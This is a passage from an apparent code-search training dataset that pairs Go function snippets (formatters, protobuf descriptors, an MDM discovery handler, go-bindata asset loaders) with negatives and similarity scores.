spaces3\n\tif t.SpoofedStatus != nil {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %t\\n\", spacesn3, \"spoofed-status\", *t.SpoofedStatus)\n\t}\n\tif t.SourcePrefix != nil {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %s\\n\", spacesn3, \"source-prefix\", *t.SourcePrefix)\n\t}\n\tfor k, v := range t.SourcePortRange {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s[%d]\\\":\\n\", spacesn3, \"source-port-range\", k+1)\n\t\tif v.LowerPort != nil {\n\t\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %d\\n\", spacesn6, \"lower-port\", *v.LowerPort)\n\t\t}\n\t\tif v.UpperPort != nil {\n\t\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %d\\n\", spacesn6, \"upper-port\", *v.UpperPort)\n\t\t}\n\t}\n\tfor k, v := range t.SourceIcmpTypeRange {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s[%d]\\\":\\n\", spacesn3, \"source-icmp-type-range\", k+1)\n\t\tif v.LowerType != nil {\n\t\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %d\\n\", spacesn6, \"lower-type\", *v.LowerType)\n\t\t}\n\t\tif v.UpperType != nil {\n\t\t\tresult += fmt.Sprintf(\"%s\\\"%s\\\": %d\\n\", spacesn6, \"upper-type\", *v.UpperType)\n\t\t}\n\t}\n\tfor k, v := range t.TotalAttackTraffic {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s[%d]\\\":\\n\", spacesn3, \"total-attack-traffic\", k+1)\n\t\tresult += v.String(spacesn3)\n\t}\n\tfor k, v := range t.TotalAttackConnectionProtocol {\n\t\tresult += fmt.Sprintf(\"%s\\\"%s[%d]\\\":\\n\", spacesn3, \"total-attack-connection-protocol\", k+1)\n\t\tresult += v.String(spacesn3)\n\t}\n\treturn\n}", "func (e *Engine) display(m *nats.Msg) {\n\tsubjectSize := len(m.Subject)\n\tif subjectSize > e.longestSubSize {\n\t\te.longestSubSize = subjectSize\n\t}\n\tpaddingSize := e.longestSubSize - subjectSize\n\tpadding := strings.Repeat(\" \", paddingSize)\n\n\tvar text string\n\tswitch e.format {\n\tcase \"docker-logs\":\n\t\t// Use colorized Docker logging output format\n\t\tl := make(map[string]interface{})\n\t\terr := json.Unmarshal(m.Data, &l)\n\t\tif err != nil {\n\t\t\ttext = fmt.Sprintf(\"%s%s | %s\\n\", m.Subject, padding, err)\n\t\t\treturn\n\t\t}\n\n\t\tif e.showTimestamp {\n\t\t\ttext = fmt.Sprintf(\"%s%s | %-30s -- %s\\n\", hashColor(m.Subject), padding, l[\"time\"], l[\"text\"])\n\t\t} else {\n\t\t\ttext = fmt.Sprintf(\"%s%s | %s\\n\", hashColor(m.Subject), padding, l[\"text\"])\n\t\t}\n\tcase \"raw\":\n\t\ttext = fmt.Sprintf(\"%s%s | %s\\n\", hashColor(m.Subject), padding, string(m.Data))\n\tdefault:\n\t\t// Unsupported format\n\t\tlog.Fatalf(\"Unsupported output format\")\n\t}\n\n\tlog.Printf(text)\n\n\treturn\n}", "func (r Result) String() string { return r.Title + \"\\n\" }", "func messageSummary(msg btcwire.Message) string {\n\tswitch msg := msg.(type) {\n\tcase *btcwire.MsgVersion:\n\t\treturn fmt.Sprintf(\"agent %s, pver %d, block %d\",\n\t\t\tmsg.UserAgent, msg.ProtocolVersion, msg.LastBlock)\n\n\tcase *btcwire.MsgVerAck:\n\t\t// No summary.\n\n\tcase *btcwire.MsgGetAddr:\n\t\t// No summary.\n\n\tcase *btcwire.MsgAddr:\n\t\treturn fmt.Sprintf(\"%d addr\", len(msg.AddrList))\n\n\tcase *btcwire.MsgPing:\n\t\t// No summary - perhaps add nonce.\n\n\tcase *btcwire.MsgPong:\n\t\t// No summary - perhaps add nonce.\n\n\tcase *btcwire.MsgAlert:\n\t\t// No summary.\n\n\tcase *btcwire.MsgMemPool:\n\t\t// No summary.\n\n\tcase *btcwire.MsgTx:\n\t\thash, _ := msg.TxSha()\n\t\treturn fmt.Sprintf(\"hash %s, %d inputs, %d outputs, lock %s\",\n\t\t\thash, len(msg.TxIn), len(msg.TxOut),\n\t\t\tformatLockTime(msg.LockTime))\n\n\tcase *btcwire.MsgBlock:\n\t\theader := &msg.Header\n\t\thash, _ := msg.BlockSha()\n\t\treturn fmt.Sprintf(\"hash %s, ver %d, %d tx, %s\", hash,\n\t\t\theader.Version, len(msg.Transactions), header.Timestamp)\n\n\tcase *btcwire.MsgInv:\n\t\treturn invSummary(msg.InvList)\n\n\tcase *btcwire.MsgNotFound:\n\t\treturn invSummary(msg.InvList)\n\n\tcase *btcwire.MsgGetData:\n\t\treturn invSummary(msg.InvList)\n\n\tcase *btcwire.MsgGetBlocks:\n\t\treturn locatorSummary(msg.BlockLocatorHashes, &msg.HashStop)\n\n\tcase *btcwire.MsgGetHeaders:\n\t\treturn locatorSummary(msg.BlockLocatorHashes, &msg.HashStop)\n\n\tcase *btcwire.MsgHeaders:\n\t\treturn fmt.Sprintf(\"num %d\", len(msg.Headers))\n\n\tcase *btcwire.MsgReject:\n\t\t// Ensure the variable length strings don't contain any\n\t\t// characters which are even remotely dangerous such as HTML\n\t\t// control characters, etc. Also limit them to sane length for\n\t\t// logging.\n\t\trejCommand := sanitizeString(msg.Cmd, btcwire.CommandSize)\n\t\trejReason := sanitizeString(msg.Reason, maxRejectReasonLen)\n\t\tsummary := fmt.Sprintf(\"cmd %v, code %v, reason %v\", rejCommand,\n\t\t\tmsg.Code, rejReason)\n\t\tif rejCommand == btcwire.CmdBlock || rejCommand == btcwire.CmdTx {\n\t\t\tsummary += fmt.Sprintf(\", hash %v\", msg.Hash)\n\t\t}\n\t\treturn summary\n\t}\n\n\t// No summary for other messages.\n\treturn \"\"\n}", "func (s NicerButSlowerFilmList) String() string {\n\tres := make([]string, 8)\n\tres[0] = \"FID: \" + reform.Inspect(s.FID, true)\n\tres[1] = \"Title: \" + reform.Inspect(s.Title, true)\n\tres[2] = \"Description: \" + reform.Inspect(s.Description, true)\n\tres[3] = \"Category: \" + reform.Inspect(s.Category, true)\n\tres[4] = \"Price: \" + reform.Inspect(s.Price, true)\n\tres[5] = \"Length: \" + reform.Inspect(s.Length, true)\n\tres[6] = \"Rating: \" + reform.Inspect(s.Rating, true)\n\tres[7] = \"Actors: \" + reform.Inspect(s.Actors, true)\n\treturn strings.Join(res, \", \")\n}", "func showFeedTask(feed feed.Feed, task ClientMessage) {\n\tpostByteArray := feed.ShowFeed()\n\tfeedArray := []PostData{}\n\tfor _, post := range(postByteArray) {\n\t\tvar pd PostData\n\t\terr := json.Unmarshal(post, &pd)\n\t\tif err != nil {\n\t\t\tfmt.Println(\"error: \", err)\n\t\t}\n\t\tfeedArray = append(feedArray, pd)\n\t}\n\tsm, _ := json.MarshalIndent(ServerFeedMessage{Id: task.Id, Feed: feedArray}, \"\", \" \")\n\tfmt.Printf(\"%s\\n\", sm)\n}", "func (ulw Wrapper) Description() string {\n\tvar count int\n\tfor row := range ulw.ul.Results {\n\t\tif ulw.ul.Results[row].Username != \"\" {\n\t\t\tcount++\n\t\t}\n\t}\n\treturn fmt.Sprintf(\"Activity by Username (processlist) %d rows\", count)\n}", "func (m *MessageDescriptor) Format(language string, data map[string]any) (msg string) {\n\tvar err error\n\tif fmt := m.translationFormats[language]; fmt != nil {\n\t\tmsg, err = fmt.FormatMap(data)\n\t} else {\n\t\tmsg, err = m.defaultFormat.FormatMap(data)\n\t}\n\tif err != nil {\n\t\tmsg = m.id // This shouldn't happen.\n\t}\n\treturn\n}", "func (e entry) String() string {\n\treturn fmt.Sprintf(`\nid %v\nday %v\nreceived %v\ndispatched %v\narrived %v\ncleared %v\ncall_type %v\ngrid_location %v\nas_observed %v\naddress %v\nclearance_code %v\nresp_officer %v\nunits %v\ndescription %v\ncall_comments %v\n`,\n\t\te.id, e.day, e.received, e.dispatched, e.arrived, e.cleared, e.call_type, e.grid_location, e.as_observed, e.address,\n\t\te.clearance_code, e.resp_officer, e.units, e.description, e.call_comments)\n\n}", "func (*GetAllDiscussGroupResponse) Descriptor() ([]byte, []int) {\n\treturn file_proto_group_group_proto_rawDescGZIP(), []int{6}\n}", "func List() {\n\tvar name string\n\tisGroup := false\n\n\tfmt.Printf(\"\\nShowing %v conversation(s):\\n\", len(jsonData))\n\n\t//jsonDataList := *jsonDatap\n\n\tfor i, block := range jsonData {\n\n\t\tfor _, participant := range block.Participants {\n\t\t\tif participant == master {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tif len(block.Participants) >= 3 {\n\t\t\t\tisGroup = true\n\t\t\t}\n\t\t\tname = participant\n\t\t}\n\t\tif !isGroup {\n\t\t\tfmt.Printf(\"[%v] - %v\\n\", i, name)\n\t\t} else {\n\t\t\tfmt.Printf(\"[%v] - group: participants %+v\\n\", i, block.Participants)\n\t\t\tisGroup = false\n\t\t}\n\t}\n\n\tfmt.Println(\"\")\n}", "func (d *Dispatcher) getFormattedMessage(n *model.Notification) string {\n\ttrimmedMessage := strings.TrimSpace(n.Message)\n\tmessage := strings.Replace(html.EscapeString(trimmedMessage), \"\\n\", \"<br />\", -1) // default to text/plain\n\n\tif optionsDisplayRaw, ok := n.Extras[\"client::display\"]; ok {\n\t\toptionsDisplay, ok := optionsDisplayRaw.(map[string]interface{})\n\n\t\tif ok {\n\t\t\tif contentTypeRaw, ok := optionsDisplay[\"contentType\"]; ok {\n\t\t\t\tcontentType := fmt.Sprintf(\"%v\", contentTypeRaw)\n\t\t\t\tlog.Printf(\"Message content type: %s\", contentType)\n\n\t\t\t\tswitch contentType {\n\t\t\t\tcase \"html\", \"text/html\":\n\t\t\t\t\tmessage = strings.Replace(trimmedMessage, \"\\n\", \"<br />\", -1)\n\t\t\t\tcase \"markdown\", \"md\", \"text/md\", \"text/markdown\":\n\t\t\t\t\t// allow HTML in Markdown\n\t\t\t\t\tmessage = string(markdown.ToHTML([]byte(trimmedMessage), nil, nil))\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn message\n}", "func (*CMsgDOTAGetRecentPlayTimeFriendsResponse) Descriptor() ([]byte, []int) {\n\treturn file_dota_gcmessages_client_proto_rawDescGZIP(), []int{260}\n}", "func (o *Screenrecordingmetadata) String() string {\n \n \n \n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (s Set) FormatList() string {\n\tif len(s) == 0 {\n\t\treturn \"\"\n\t}\n\n\t// Collect members in a sorted list.\n\tm := s.SortedMembers()\n\n\t// Build list\n\tlist := \"\"\n\tfor len(m) > 0 {\n\t\t// Determine length of run.\n\t\tn := 0\n\t\tfor ; n < len(m) && m[n] == m[0]+uint(n); n++ {\n\t\t}\n\t\t// Append to list.\n\t\tif list != \"\" {\n\t\t\tlist += \",\"\n\t\t}\n\t\tlist += strconv.FormatUint(uint64(m[0]), 10)\n\t\tif n > 1 {\n\t\t\tlist += \"-\" + strconv.FormatUint(uint64(m[n-1]), 10)\n\t\t}\n\t\t// Advance.\n\t\tm = m[n:]\n\t}\n\n\treturn list\n}", "func (*CMsgClientToGCCavernCrawlUseItemOnRoomResponse) Descriptor() ([]byte, []int) {\n\treturn file_dota_gcmessages_client_proto_rawDescGZIP(), []int{294}\n}", "func outputPeerDiscovery(nodehost host.Host, peerchan <-chan peer.AddrInfo) int {\n\t// Iterate over the peer channel\n\ttotal := 0\n\tfor peer := range peerchan {\n\t\t// Ignore if the discovered peer is the host itself\n\t\tif peer.ID == nodehost.ID() {\n\t\t\tcontinue\n\t\t}\n\n\t\t// Connect to the peer\n\t\t//nodehost.Connect(context.Background(), peer)\n\t\tpeerJSON, _ := json.MarshalIndent(peer, \"\", \" \")\n\t\tfmt.Println(string(peerJSON[:]) + \",\")\n\t\ttotal++\n\t}\n\treturn total\n}", "func DiscoveryHandler(w http.ResponseWriter, r *http.Request) {\n\t// Return HTTP Status 200 Ok when a HTTP GET request is received.\n\tif r.Method == http.MethodGet {\n\t\tw.WriteHeader(http.StatusOK)\n\t\treturn\n\t}\n\n\t// Read The HTTP Request body\n\tbodyRaw, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tbody := string(bodyRaw)\n\n\t// Retrieve the MessageID From The Body For The Response\n\t// Note: The XML isn't parsed to keep this example simple but in your server it would have to have been\n\t// So ignore the strings.Replace and Regex stuff you wouldn't do it this way\n\tmessageID := strings.Replace(strings.Replace(regexp.MustCompile(`<a:MessageID>[\\s\\S]*?<\\/a:MessageID>`).FindStringSubmatch(body)[0], \"<a:MessageID>\", \"\", -1), \"</a:MessageID>\", \"\", -1)\n\n\tvar extraParams = \"\"\n\tif authPolicy == \"Federated\" {\n\t\textraParams += \"<AuthenticationServiceUrl>https://\" + domain + \"/EnrollmentServer/Auth</AuthenticationServiceUrl>\"\n\t}\n\n\t// Create response payload\n\tresponse := []byte(`<s:Envelope xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:a=\"http://www.w3.org/2005/08/addressing\">\n <s:Header>\n <a:Action s:mustUnderstand=\"1\">http://schemas.microsoft.com/windows/management/2012/01/enrollment/IDiscoveryService/DiscoverResponse</a:Action>\n <ActivityId CorrelationId=\"8c6060c4-3d78-4d73-ae17-e8bce88426ee\" xmlns=\"http://schemas.microsoft.com/2004/09/ServiceModel/Diagnostics\">8c6060c4-3d78-4d73-ae17-e8bce88426ee</ActivityId>\n <a:RelatesTo>` + messageID + `</a:RelatesTo>\n </s:Header>\n <s:Body>\n <DiscoverResponse xmlns=\"http://schemas.microsoft.com/windows/management/2012/01/enrollment\">\n <DiscoverResult>\n\t\t\t\t<AuthPolicy>` + authPolicy + `</AuthPolicy>\n\t\t\t\t<EnrollmentVersion>4.0</EnrollmentVersion>\n\t\t\t\t<EnrollmentPolicyServiceUrl>https://` + domain + `/EnrollmentServer/Policy.svc</EnrollmentPolicyServiceUrl>\n\t\t\t\t<EnrollmentServiceUrl>https://` + domain + `/EnrollmentServer/Enrollment.svc</EnrollmentServiceUrl>\n\t\t\t\t` + extraParams + `\n </DiscoverResult>\n </DiscoverResponse>\n </s:Body>\n</s:Envelope>`)\n\n\t// Return request body\n\tw.Header().Set(\"Content-Type\", \"application/soap+xml; charset=utf-8\")\n\tw.Header().Set(\"Content-Length\", strconv.Itoa(len(response)))\n\tw.Write(response)\n}", "func (*ListPodPlanningsResponse) Descriptor() ([]byte, []int) {\n\treturn file_alameda_api_v1alpha1_datahub_plannings_services_proto_rawDescGZIP(), []int{7}\n}", "func (*ConversationItem) Descriptor() ([]byte, []int) {\n\treturn file_box_search_proto_rawDescGZIP(), []int{1}\n}", "func sessionConfigurationPayloadDisplay(data *messages.SignalConfigs) {\n\tvar result string = \"\\n\"\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"session-id\", data.MitigatingConfig.SessionId)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"heartbeat-interval\", data.MitigatingConfig.HeartbeatInterval)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"missing-hb-allowed\", data.MitigatingConfig.MissingHbAllowed)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"max-retransmit\", data.MitigatingConfig.MaxRetransmit)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"ack-timeout\", data.MitigatingConfig.AckTimeout)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %f\\n\", \"ack-random-factor\", data.MitigatingConfig.AckRandomFactor)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"heartbeat-interval-idle\", data.IdleConfig.HeartbeatInterval)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"missing-hb-allowed-idle\", data.IdleConfig.MissingHbAllowed)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"max-retransmit-idle\", data.IdleConfig.MaxRetransmit)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"ack-timeout-idle\", data.IdleConfig.AckTimeout)\n\tresult += fmt.Sprintf(\" \\\"%s\\\": %f\\n\", \"ack-random-factor-idle\", data.IdleConfig.AckRandomFactor)\n\tlog.Infoln(result)\n}", "func (l legalHoldInfoMessage) String() string {\n\tif l.Err != nil {\n\t\treturn console.Colorize(\"LegalHoldMessageFailure\", \"Unable to get object legal hold status `\"+l.Key+\"`. \"+l.Err.Error())\n\t}\n\tvar msg string\n\n\tvar legalhold string\n\tswitch l.LegalHold {\n\tcase \"\":\n\t\tlegalhold = console.Colorize(\"LegalHoldNotSet\", \"Not set\")\n\tcase minio.LegalHoldEnabled:\n\t\tlegalhold = console.Colorize(\"LegalHoldOn\", l.LegalHold)\n\tcase minio.LegalHoldDisabled:\n\t\tlegalhold = console.Colorize(\"LegalHoldOff\", l.LegalHold)\n\t}\n\n\tmsg += \"[ \" + centerText(legalhold, 8) + \" ] \"\n\n\tif l.VersionID != \"\" {\n\t\tmsg += \" \" + console.Colorize(\"LegalHoldVersion\", l.VersionID) + \" \"\n\t}\n\n\tmsg += \" \"\n\tmsg += l.Key\n\treturn msg\n}", "func (s ConversationLevelSlotResolutionResultItem) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (*Discovery) Descriptor() ([]byte, []int) {\n\treturn file_raft_proto_rawDescGZIP(), []int{0}\n}", "func (*CBroadcast_GetBroadcastChatInfo_Response) Descriptor() ([]byte, []int) {\n\treturn file_steammessages_broadcast_steamclient_proto_rawDescGZIP(), []int{21}\n}", "func (d *DNS) Info() string {\n\treturn fmt.Sprintf(\"DNS names\\t%s\", strings.Join(d.Names, \", \"))\n}", "func (*TopStoriesResponse) Descriptor() ([]byte, []int) {\n\treturn file_proto_news_proto_rawDescGZIP(), []int{4}\n}", "func (node Partitions) Format(buf *TrackedBuffer) {\n\tif node == nil {\n\t\treturn\n\t}\n\tprefix := \" partition (\"\n\tfor _, n := range node {\n\t\tbuf.astPrintf(node, \"%s%v\", prefix, n)\n\t\tprefix = \", \"\n\t}\n\tbuf.WriteString(\")\")\n}", "func (o *Botversionsummary) String() string {\n \n \n \n \n\n j, _ := json.Marshal(o)\n str, _ := strconv.Unquote(strings.Replace(strconv.Quote(string(j)), `\\\\u`, `\\u`, -1))\n\n return str\n}", "func (p *MediaPlaylist) String() string {\n\treturn p.mkM3u8().String()\n}", "func (*CAccountHardware_VRCompatibilityCheck_Response_ComponentDisplay) Descriptor() ([]byte, []int) {\n\treturn file_steammessages_accounthardware_steamclient_proto_rawDescGZIP(), []int{20, 1}\n}", "func (s FirewallDomainListMetadata) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (el EpisodeList) FormatLog(ec EpisodeCount) string {\n\tparts := make([]string, len(el))\n\tfor i, er := range el {\n\t\tswitch er.Type {\n\t\tcase EpisodeTypeRegular:\n\t\t\tparts[i] = er.FormatLog(ec.RegularCount)\n\t\tcase EpisodeTypeSpecial:\n\t\t\tparts[i] = er.FormatLog(ec.SpecialCount)\n\t\tcase EpisodeTypeCredits:\n\t\t\tparts[i] = er.FormatLog(ec.CreditsCount)\n\t\tcase EpisodeTypeOther:\n\t\t\tparts[i] = er.FormatLog(ec.OtherCount)\n\t\tcase EpisodeTypeTrailer:\n\t\t\tparts[i] = er.FormatLog(ec.TrailerCount)\n\t\tcase EpisodeTypeParody:\n\t\t\tparts[i] = er.FormatLog(ec.ParodyCount)\n\t\tdefault:\n\t\t\tparts[i] = er.Format(er.scale())\n\t\t}\n\t}\n\n\treturn strings.Join(parts, \",\")\n}", "func (jf JSONFormatter) Format(event eventbridge.ScanEvent) (*Message, error) {\n\n\tjs := jsonData{\n\t\tTitle: fmt.Sprintf(\"Vulnerabilities found in %s:\", event.Detail.RepositoryName),\n\t\tRepository: repository{\n\t\t\tName: event.Detail.RepositoryName,\n\t\t\tLink: formatLink(event),\n\t\t\tFindings: []vulnerablity{},\n\t\t},\n\t}\n\n\tfor _, key := range severity.SeverityList {\n\t\tif val, ok := event.Detail.FindingSeverityCounts[key]; ok {\n\t\t\tjs.Repository.Findings = append(js.Repository.Findings, vulnerablity{\n\t\t\t\tSeverity: key,\n\t\t\t\tCount: strconv.FormatInt(int64(*val), 10),\n\t\t\t})\n\t\t}\n\t}\n\n\tmsg, err := marshal(js)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &Message{\n\t\tBody: string(msg),\n\t\tStatus: event.Detail.ScanStatus,\n\t\tRepositoryName: event.Detail.RepositoryName,\n\t}, nil\n}", "func (*CBroadcast_WebRTCAddViewerCandidate_Notification) Descriptor() ([]byte, []int) {\n\treturn file_steammessages_broadcast_steamclient_proto_rawDescGZIP(), []int{76}\n}", "func (message *Message) ReadableFormat() string {\n\treturn message.UserName + \": \" + message.Body + \"\\n\"\n}", "func (v *Visibility) Message() string {\n\treturn \"\"\n}", "func (v *HandshakeResponse) String() string {\n\tif v == nil {\n\t\treturn \"<nil>\"\n\t}\n\n\tvar fields [4]string\n\ti := 0\n\tfields[i] = fmt.Sprintf(\"Name: %v\", v.Name)\n\ti++\n\tfields[i] = fmt.Sprintf(\"APIVersion: %v\", v.APIVersion)\n\ti++\n\tfields[i] = fmt.Sprintf(\"Features: %v\", v.Features)\n\ti++\n\tif v.LibraryVersion != nil {\n\t\tfields[i] = fmt.Sprintf(\"LibraryVersion: %v\", *(v.LibraryVersion))\n\t\ti++\n\t}\n\n\treturn fmt.Sprintf(\"HandshakeResponse{%v}\", strings.Join(fields[:i], \", \"))\n}", "func (*ListPlanningsResponse) Descriptor() ([]byte, []int) {\n\treturn file_alameda_api_v1alpha1_datahub_plannings_services_proto_rawDescGZIP(), []int{20}\n}", "func (m *CreateIdentifier) String() (result string) {\n\tresult = \"\\n\"\n\tfor key, alias := range m.Identifier.Alias {\n\t\tresult += fmt.Sprintf(\" \\\"%s[%d]\\\":\\n\", \"alias\", key+1)\n\t\tresult += fmt.Sprintf(\" \\\"%s\\\": %s\\n\", \"alias-name\", alias.AliasName)\n\t\tif alias.Ip != nil {\n\t\t\tfor k, v := range alias.Ip {\n\t\t\t\tresult += fmt.Sprintf(\" \\\"%s[%d]\\\": %s\\n\", \"ip\", k+1, v)\n\t\t\t}\n\t\t}\n\t\tif alias.Prefix != nil {\n\t\t\tfor k, v := range alias.Prefix {\n\t\t\t\tresult += fmt.Sprintf(\" \\\"%s[%d]\\\": %s\\n\", \"prefix\", k+1, v)\n\t\t\t}\n\t\t}\n\t\tif alias.PortRange != nil {\n\t\t\tfor k, v := range alias.PortRange {\n\t\t\t\tresult += fmt.Sprintf(\" \\\"%s[%d]\\\":\\n\", \"port-range\", k+1)\n\t\t\t\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"lower-port\", v.LowerPort)\n\t\t\t\tresult += fmt.Sprintf(\" \\\"%s\\\": %d\\n\", \"upper-port\", v.UpperPort)\n\t\t\t}\n\t\t}\n\t\tif alias.FQDN != nil {\n\t\t\tfor k, v := range alias.FQDN {\n\t\t\t\tresult += fmt.Sprintf(\" \\\"%s[%d]\\\": %s\\n\", \"FQDN\", k+1, v)\n\t\t\t}\n\t\t}\n\t\tif alias.URI != nil {\n\t\t\tfor k, v := range alias.URI {\n\t\t\t\tresult += fmt.Sprintf(\" \\\"%s[%d]\\\": %s\\n\", \"URI\", k+1, v)\n\t\t\t}\n\t\t}\n\t}\n\treturn\n}", "func makeSummary(draconResult map[string]string) (string, string) {\n\tsummary := filepath.Base(draconResult[\"target\"]) + \" \" + draconResult[\"title\"]\n\n\tif len(summary) > 255 { // jira summary field supports up to 255 chars\n\t\ttobytes := bytes.Runes([]byte(summary))\n\t\tsummary = string(tobytes[:254])\n\t\textra := string(tobytes[255:])\n\t\treturn summary, extra\n\t}\n\treturn summary, \"\"\n}", "func (s ChangeMessageVisibilityBatchResultEntry) String() string {\n\treturn awsutil.Prettify(s)\n}", "func (o TopicRuleSnsOutput) MessageFormat() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v TopicRuleSns) *string { return v.MessageFormat }).(pulumi.StringPtrOutput)\n}", "func (m *MessageRule) GetDisplayName()(*string) {\n return m.displayName\n}" ]
[ "0.5028478", "0.48694223", "0.48003936", "0.4676342", "0.46760762", "0.46760762", "0.4615027", "0.45994487", "0.458241", "0.4579977", "0.45732588", "0.45495096", "0.45187613", "0.4513228", "0.44816542", "0.44712347", "0.44522518", "0.44487467", "0.4439808", "0.4423179", "0.44221777", "0.439296", "0.43905053", "0.43657207", "0.43520668", "0.43512097", "0.43359053", "0.43285385", "0.43255457", "0.43220937", "0.43220937", "0.43176198", "0.43155834", "0.4297629", "0.42951003", "0.4293079", "0.4292242", "0.42802337", "0.42762652", "0.42724496", "0.42660654", "0.42620683", "0.42608628", "0.42438152", "0.42401192", "0.4238748", "0.42369288", "0.42317155", "0.42242128", "0.42212647", "0.42176253", "0.4215275", "0.4212062", "0.4207762", "0.42067552", "0.41964865", "0.41943043", "0.4186911", "0.41839427", "0.41765702", "0.41738102", "0.41683543", "0.4168098", "0.4163615", "0.41636017", "0.41619128", "0.414969", "0.4146222", "0.41425318", "0.41414163", "0.41364503", "0.41297594", "0.41271245", "0.41254658", "0.412377", "0.41218337", "0.41210043", "0.4120163", "0.4118249", "0.41160095", "0.41145647", "0.41137284", "0.41098127", "0.41083398", "0.41037828", "0.40997428", "0.4094904", "0.40946445", "0.4092948", "0.40923527", "0.40903783", "0.40886176", "0.408848", "0.4087963", "0.40862623", "0.4084965", "0.40832764", "0.40807438", "0.40763757", "0.4072678" ]
0.8633062
0
Asset loads and returns the asset for the given name. It returns an error if the asset could not be found or could not be loaded.
func Asset(name string) ([]byte, error) { canonicalName := strings.Replace(name, "\\", "/", -1) if f, ok := _bindata[canonicalName]; ok { a, err := f() if err != nil { return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err) } return a.bytes, nil } return nil, fmt.Errorf("Asset %s not found", name) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func Asset(name string) ([]byte, error) {\n cannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n if f, ok := _bindata[cannonicalName]; ok {\n a, err := f()\n if err != nil {\n return nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n }\n return a.bytes, nil\n }\n return nil, fmt.Errorf(\"Asset %s not found\", name)\n}", "func (model *GrogModel) GetAsset(name string) (*Asset, error) {\n\tvar foundAsset *Asset\n\tvar mimeType string\n\tvar content = make([]byte, 0)\n\tvar serveExternal int64\n\tvar rendered int64\n\tvar added int64\n\tvar modified int64\n\tvar err error\n\n\trow := model.db.DB.QueryRow(`select mimeType, content, serve_external, rendered,\n\t\tadded, modified from Assets where name = ?`, name)\n\tif row.Scan(&mimeType, &content, &serveExternal, &rendered, &added, &modified) != sql.ErrNoRows {\n\t\tfoundAsset = model.NewAsset(name, mimeType)\n\t\tfoundAsset.Content = content\n\t\tif serveExternal == 1 {\n\t\t\tfoundAsset.ServeExternal = true\n\t\t} else {\n\t\t\tfoundAsset.ServeExternal = false\n\t\t}\n\n\t\tif rendered == 1 {\n\t\t\tfoundAsset.Rendered = true\n\t\t} else {\n\t\t\tfoundAsset.Rendered = false\n\t\t}\n\n\t\tfoundAsset.Added.Set(time.Unix(added, 0))\n\t\tfoundAsset.Modified.Set(time.Unix(modified, 0))\n\t} else {\n\t\terr = fmt.Errorf(\"No asset with name %s\", name)\n\t}\n\n\treturn foundAsset, err\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, &os.PathError{Op: \"open\", Path: name, Err: os.ErrNotExist}\n}", "func Asset(name string) ([]byte, error) {\n\tcannonicalName := strings.Replace(name, \"\\\\\", \"/\", -1)\n\tif f, ok := _bindata[cannonicalName]; ok {\n\t\ta, err := f()\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"Asset %s can't read by error: %v\", name, err)\n\t\t}\n\t\treturn a.bytes, nil\n\t}\n\treturn nil, 